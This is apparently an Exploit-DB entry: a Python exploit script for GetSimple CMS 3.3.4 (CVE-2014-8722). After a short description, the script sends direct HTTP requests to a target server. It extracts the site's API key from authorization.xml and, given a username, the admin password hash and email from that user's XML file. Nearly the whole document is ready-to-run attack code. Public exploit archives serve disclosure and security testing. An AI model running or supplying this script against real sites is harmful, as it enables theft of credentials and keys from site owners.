GetSimple CMS 3.3.4 - Information Disclosure

EDB-ID:

49928


Author:

Ron Jost

Type:

webapps


Platform:

PHP

Date:

2021-06-02


# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure
# Date 01.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: http://get-simple.info/
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip
# Version: 3.3.4
# CVE: CVE-2014-8722
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit


'''
Description:
GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to
(1) data/users/<username>.xml,
(2) backups/users/<username>.xml.bak,
(3) data/other/authorization.xml, or
(4) data/other/appid.xml.
'''


'''
Import required modules:
'''
import sys
import requests

'''
User-Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
cmspath = sys.argv[3]
print('')
username = input("Do you know the username? Y/N: ")
if username == 'Y':
    print('')
    username = True
    username_string = input('Please enter the username: ')
else:
    print('')
    username = False
    print('No problem, you will still get the API key')


'''
Get Api-Key:
'''
url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'
header = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Cache-Control": "max-age=0"
}
x = requests.get(url, headers=header).text
start = x.find('[') + 7
end = x.find(']')
api_key = x[start:end]
print('')
print('Informations:')
print('')
print('[*] API Key: ' + api_key)


if username:
    '''
    Get Email and Passwordhash:
    '''
    url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'
    header = {
            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
            "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Cache-Control": "max-age=0"
    }
    x = requests.get(url, headers=header).text
    start =  x[x.find('PWD>'):]
    passwordhash = start[start.find('>') +1 :start.find('<')]
    print('[*] Hashed Password: ' + passwordhash)

    start = x[x.find('EMAIL>'):]
    email = start[start.find('>') + 1 : start.find('<')]
    print('[*] Email: ' + email)
print('')